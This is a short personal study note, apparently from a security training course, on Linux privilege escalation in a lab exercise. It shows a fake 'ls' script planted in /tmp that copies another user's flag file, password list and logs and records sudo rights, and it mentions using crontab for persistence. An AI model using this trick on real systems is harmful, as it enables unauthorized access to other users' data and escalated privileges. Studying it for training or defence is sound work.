jacobcreedwatkins/security/linux priv esc (day 11)/linux privilege escalation notes.md

 PSP: unknown
 Malware: unknown
 Action: Test supplied credentials, if possible gain access to host.
 Conduct host survey and gain privileged access.

+USING A FALSE BINARY TO PERFORM PRIVESC (sussy ls command)

+example:
+> cd /tmp
+> touch ls

+#!/bin/bash
+/bin/cat /home/billybob/f!@g1.txt > /tmp/actualFlag.txt
+/bin/cat /home/billybob/10-million-password-list-top-10000.txt > /tmp/passList.txt
+/bin/cat /home/billybob/logs > /tmp/logs
+/usr/bin/sudo -l > /tmp/sudoCommands

+change the commands accordingly

+crontabs:

+> crontab -e

+make sure you use the cron guru website to build your crons

+append your command to the end of the crontab

+watch -n1 'what_to_watch' ##for ease of use

 ```